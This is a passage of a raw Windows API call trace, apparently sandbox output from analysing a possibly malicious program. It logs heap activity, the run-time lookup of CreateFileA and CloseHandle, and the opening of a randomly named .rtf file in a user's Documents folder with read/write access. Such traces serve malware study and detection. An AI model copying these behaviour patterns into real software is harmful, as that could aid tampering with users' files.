lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0033.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0033.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.435] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0033.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0033.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf", cchWideChar=89, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x59) returned 0x87aa40 [0033.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf", cchWideChar=89, lpMultiByteStr=0x87aa40, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf", lpUsedDefaultChar=0x0) returned 89 [0033.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0033.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.436] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\fe6emki1ftxh0mxk.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=89, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb2) returned 0x7c5448 [0033.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=89, lpWideCharStr=0x7c5448, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf") returned 89 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c5508 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.438] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.440] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0033.440] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0033.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.441] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.441] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8e0 [0033.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c8e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.442] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0033.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.442] CloseHandle (hObject=0x140) returned 1 [0033.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.442] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.443] 